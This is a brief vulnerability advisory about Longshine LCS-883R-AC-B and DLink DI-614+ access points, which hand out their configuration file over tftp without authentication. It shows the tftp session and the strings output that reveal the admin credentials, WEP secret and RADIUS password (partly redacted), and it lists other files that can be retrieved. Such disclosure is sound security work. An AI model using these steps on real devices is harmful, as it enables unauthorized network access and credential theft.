|
COMMAND Various WLAN Access-Points reveal admin password via tftp of config file SYSTEMS AFFECTED Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps Versions 03.01.0b and 03.01.0h (Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.) DLink DI-614+ firmware version 2.03 PROBLEM Thanks to Lukas Grunwald aka REG lg1 [lukas@dnx.de] advisory : You are able to connect via tftp to the access-point an you can get download the configuration without authentication the WEP Secret for the encryption and the password from your radius server is also readable. In this configuration in the Username of the Superuser and the corresponding password stored. The WEP Secret for the encryption and the password from your radius server is also readable. This "attack" works via WLAN (!!!) and Ethernet. tftp tftp> connect 192.168.108.48 tftp> get config.img Received 780 bytes in 1.0 seconds tftp> quit [~]/-\>strings config.img DNXLABAP01 <- name of the AP root <- name of the superuser XXXXXX123 <- password from superuser DNXLABLAN <- ssid secu9 <- secret for WEP 7890abcdef <- You are also able to get the following files: config.img wbtune.dat mac.dat rom.img normal.img SOLUTION None yet